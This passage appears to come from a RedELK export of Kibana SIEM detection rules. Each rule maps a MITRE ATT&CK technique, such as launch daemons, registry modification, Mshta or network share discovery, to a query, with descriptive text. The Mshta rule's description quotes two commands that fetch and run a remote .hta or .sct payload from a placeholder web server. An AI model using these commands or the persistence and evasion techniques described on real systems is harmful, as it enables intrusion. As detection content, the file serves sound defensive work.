malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in /System/Library/LaunchAgents, /Library/LaunchAgents, and $HOME/Library/LaunchAgents [1] [2] [3]. These launch agents have property list files which point to the executables that will be launched [4].\nAdversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories [5] [6]. The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in [7] [8]. They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1159","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1159] Launch Agent","query":"threat.technique.id: T1159","references":["https://attack.mitre.org/techniques/T1159","https://attack.mitre.org/techniques/T1543/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1159","name":"Launch Agent","id":"T1159"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons [1]. These LaunchDaemons have property list files which point to the executables that will be launched [2].\nAdversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories [3]. The daemon name may be disguised by using a name from a related operating system or benign software [4]. Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.\nThe plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1160","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1160] Launch Daemon","query":"threat.technique.id: T1160","references":["https://attack.mitre.org/techniques/T1160","https://attack.mitre.org/techniques/T1543/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1160","name":"Launch Daemon","id":"T1160"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1160","name":"Launch Daemon","id":"T1160"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Launchctl","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1152","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1152] Launchctl","query":"threat.technique.id: T1152","references":["https://attack.mitre.org/techniques/T1152","https://attack.mitre.org/techniques/T1569/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1152","name":"Launchctl","id":"T1152"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1152","name":"Launchctl","id":"T1152"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1152","name":"Launchctl","id":"T1152"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.[1]\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1168","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1168] Local Job Scheduling","query":"threat.technique.id: T1168","references":["https://attack.mitre.org/techniques/T1168","https://attack.mitre.org/techniques/T1053"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1168","name":"Local Job Scheduling","id":"T1168"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1168","name":"Local Job Scheduling","id":"T1168"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1037","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1037] Logon Scripts","query":"threat.technique.id: T1037","references":["https://attack.mitre.org/techniques/T1037"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1037","name":"Logon Scripts","id":"T1037"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1037","name":"Logon Scripts","id":"T1037"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges).\nAdversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.[1]\nA specific plist used for execution at login is com.apple.loginitems.plist.[2] Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.[3] Users have direct control over login items installed using a shared file list which are also visible in System Preferences [3]. Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to \"hide\" the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in [4] [5]. The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like AppleScript can do this as well. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1162","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1162] Login Item","query":"threat.technique.id: T1162","references":["https://attack.mitre.org/techniques/T1162","https://attack.mitre.org/techniques/T1547/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1162","name":"Login Item","id":"T1162"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. [1]\nA specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. [2] [3]\nBrowser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1185","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1185] Man in the Browser","query":"threat.technique.id: T1185","references":["https://attack.mitre.org/techniques/T1185"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1185","name":"Man in the Browser","id":"T1185"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\nRenaming abusable system utilities to evade security monitoring is also a form of Masquerading.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1036","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1036] Masquerading","query":"threat.technique.id: T1036","references":["https://attack.mitre.org/techniques/T1036"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1036","name":"Masquerading","id":"T1036"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.[1] Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg.\nAdversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.\nAn adversary may also incorporate Masquerading by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1031","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1031] Modify Existing Service","query":"threat.technique.id: T1031","references":["https://attack.mitre.org/techniques/T1031","https://attack.mitre.org/techniques/T1543/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1031","name":"Modify Existing Service","id":"T1031"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. [1] Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API. [2] Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. [3] [4]\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. [5] Often Valid Accounts are required, along with access to the remote system's SMB/Windows Admin Shares for RPC communication.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1112","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1112] Modify Registry","query":"threat.technique.id: T1112","references":["https://attack.mitre.org/techniques/T1112"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1112","name":"Modify Registry","id":"T1112"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1104","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1104] Multi-Stage Channels","query":"threat.technique.id: T1104","references":["https://attack.mitre.org/techniques/T1104"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1104","name":"Multi-Stage Channels","id":"T1104"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code [1] [2] [3] [4] [5]\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. [6] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. [7]\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. [8]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1170","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1170] Mshta","query":"threat.technique.id: T1170","references":["https://attack.mitre.org/techniques/T1170","https://attack.mitre.org/techniques/T1218/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1170","name":"Mshta","id":"T1170"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1170","name":"Mshta","id":"T1170"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Multiband Communication","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1026","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1026] Multiband Communication","query":"threat.technique.id: T1026","references":["https://attack.mitre.org/techniques/T1026"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1026","name":"Multiband Communication","id":"T1026"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1188","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1188] Multi-hop Proxy","query":"threat.technique.id: T1188","references":["https://attack.mitre.org/techniques/T1188","https://attack.mitre.org/techniques/T1090/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1188","name":"Multi-hop Proxy","id":"T1188"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1079","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1079] Multilayer Encryption","query":"threat.technique.id: T1079","references":["https://attack.mitre.org/techniques/T1079","https://attack.mitre.org/techniques/T1573"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1079","name":"Multilayer Encryption","id":"T1079"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. [1] Within MFT entries are file attributes, [2] such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). [1] [3] [4] [5]\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. [6] [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1096","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1096] NTFS File Attributes","query":"threat.technique.id: T1096","references":["https://attack.mitre.org/techniques/T1096","https://attack.mitre.org/techniques/T1564/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1096","name":"NTFS File Attributes","id":"T1096"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes[1] and to support other malicious activities, including distraction[2], hacktivism, and extortion.[3]\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\nFor DoS attacks targeting the hosting system directly, see Endpoint Denial of Service.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1498","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1498] Network Denial of Service","query":"threat.technique.id: T1498","references":["https://attack.mitre.org/techniques/T1498"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1498","name":"Network Denial of Service","id":"T1498"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. [1] The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. [2][3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1128","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1128] Netsh Helper DLL","query":"threat.technique.id: T1128","references":["https://attack.mitre.org/techniques/T1128","https://attack.mitre.org/techniques/T1546/007"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1128","name":"Netsh Helper DLL","id":"T1128"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1046","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1046] Network Service Scanning","query":"threat.technique.id: T1046","references":["https://attack.mitre.org/techniques/T1046"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1046","name":"Network Service Scanning","id":"T1046"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\nFile sharing over a Windows network occurs over the SMB protocol. [1] [2] Net can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share.\nCloud virtual networks may contain remote network shares or file storage services accessible to an adversary after they have obtained access to a system. For example, AWS, GCP, and Azure support creation of Network File System (NFS) shares and Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based systems.[3][4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1135","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1135] Network Share Discovery","query":"threat.technique.id: T1135","references":["https://attack.mitre.org/techniques/T1135"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1135","name":"Network Share Discovery","id":"T1135"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the net use \\system\\share /delete command. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1126","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1126] Network Share Connection Removal","query":"threat.technique.id: T1126","references":["https://attack.mitre.org/techniques/T1126","https://attack.mitre.org/techniques/T1070/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1126","name":"Network Share Connection Removal","id":"T1126"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as LLMNR/NBT-NS Poisoning and SMB Relay, can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP 